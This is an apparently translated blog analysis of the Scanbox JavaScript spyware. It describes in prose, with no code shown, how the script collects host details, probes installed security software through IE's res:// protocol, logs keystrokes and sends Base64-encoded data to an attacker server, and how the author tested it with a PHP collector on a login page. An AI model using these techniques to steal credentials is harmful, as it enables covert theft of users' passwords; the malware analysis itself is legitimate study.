Javascript spyware script analysis: analysis and demonstration of Scanbox source code of Web malware

Javascript spyware script analysis: analysis and demonstration of Scanbox source code of Web malware

This Scanbox malicious code is a Javascript malicious script with functions such as information collection and keylogging, and is suitable for IE browsers. Scanbox provides functions such as collecting basic host information, obtaining host-installed applications, obtaining Flash versions, obtaining Office versions, and verifying Adobe Reader and keyboard records.

Next, we will analyze how the source code of each function is implemented. By the way, many Chinese tech websites have reposted their reports, but few have analyzed and interpreted the source code, the author finally found this incomplete (817 lines) source code in the personal blog of overseas security personnel.

Program Framework

First, let's take a look at the program framework of the Scanbox script.

When a malicious script is inserted into a website page and accessed by users, the script is parsed locally by the browser. The program flow can be abstracted into several modules shown in Figure 1.

Collect basic information

Figure 2: The scanbox.info object record contains some basic information about the current page header, as well as host information such as screen resolution, operating system, and language.

Encryption module

There is nothing to say about this. We didn't introduce the Base64 class library, so we use Base64 encoding implemented by native JS.

Communication Module

The communication module is implemented through two functions: A get function and a post function, which are common methods of http requests. This function delivers the stolen information to the attacker's backend server. The get function creates an image object and implements get requests by setting the src attribute. The post function creates a form, sets the input element, encrypts it, and CALLS submit () to submit for post. This is also a convenient way for Javascript to communicate with the background.

Active reporting module

 

Similarly, the image object uses the GET method to transmit data to the background, and the encryption module (Base64) is used before data transmission. You can use the setInterval function to set a timer and report the task to the server at a certain interval.

Plug-in Set

1. pluginid = 1

The plug-in 1st (pluginid = 1) function is to obtain the list of software installed in the operating system by using the res: // protocol. Res protocol is a predefined protocol of IE browser. It can analyze all resource files that comply with Win32 PE format. As shown in figure 6 below:

It is a bitmap resource file that uses the file upload tool resourceeditor assumer.exe. However, this function can also be implemented using IE browser, as follows:

Then, you can create an image object and set the src attribute of the image object to the URL of the resource file that accesses a specific PE file through the res protocol, the onload and onerror events of the image are used to determine whether the image object is successfully loaded. This is equivalent to determining whether the res protocol corresponding to the src attribute of the image object is successfully accessed, to determine whether a specific application is installed on the victim host. For example:

However, Scanbox does not use this method for determination. Instead, it creates an ActiveXObject ("Microsoft. XMLDOM") object to parse the res protocol in the XML document. The XML Format String constructed before the validateXML function is called in Red:

Next, call validateXML for verification. The principle is to create an ActiveXObject object for parsing. Identify whether the PE files accessed by the res protocol exist in the XML document by matching the error code features, and then determine whether the host installs a specific application.

As part of the Application List enumerated in the Scanbox source code, it can be found that Scanbox focuses on whether the host is installed with security software, which collects important information for further attacks.
 

2. pluginid = 3

Plug-in 3rd (pluginid = 3) is used to determine the Flash version information. The principle is to call ActiveXObject () objects related to flash to obtain the flash version.

3. pluginid = 5

Plug-in 5th (pluginid = 5) is used to obtain information about the Office version. The same principle is to create an ActiveXObject object and obtain the version number.

4. pluginid = 6

Plug-in 6th (pluginid = 6) is used to determine whether to install AdobeReader. The principle is the same as above.

5. pluginid = 21

This incomplete Scanbox source code does not find a record for listening to keyboard percussion, but the focus of the online reports is mostly on this, however, I added the keyboard record module based on the plug-in call mode in Scanbox. In fact, Javascript is used to record the existing code on the Internet, and the implementation method is the same, that is, the document. onkeydown and document. onkeypress events are used, as follows:

Here we only introduce the plug-ins in the Scanbox source code that can be found. However, from the plug-in number, many plug-ins are not included in the source code, so I can only analyze this point.

 

Script test

 

If the website page has a stored XSS vulnerability, or the Scanbox is implanted into a page containing a login box by other penetration means, it will cause serious consequences if the page is accessed and loaded by the user. The password entered by the user upon login will be sent back to the attacker's background along with the record of the keyboard listening module, and will be in plaintext.

I wrote several simple PHP scripts on the backend as the target for returning data from Scanbox. After decoding Base64, I saved the key records in the local txt file.

Next, we will implant a Scanbox malicious script on the background login page of a specific website to observe the behavior after the page is loaded.

As shown in, the key record will be written to a local file

Conclusion

In general, Scanbox is a malicious script parsed by the client. Its attack effect is restricted by the browser security configuration, but it does not affect its powerful functions and serious consequences. If attackers exploit this vulnerability properly and use it with the stored XSS vulnerability to implement a Watering Hole attack, they can monitor the user name and password entered during user logon, this will pose immeasurable risks to user privacy and property.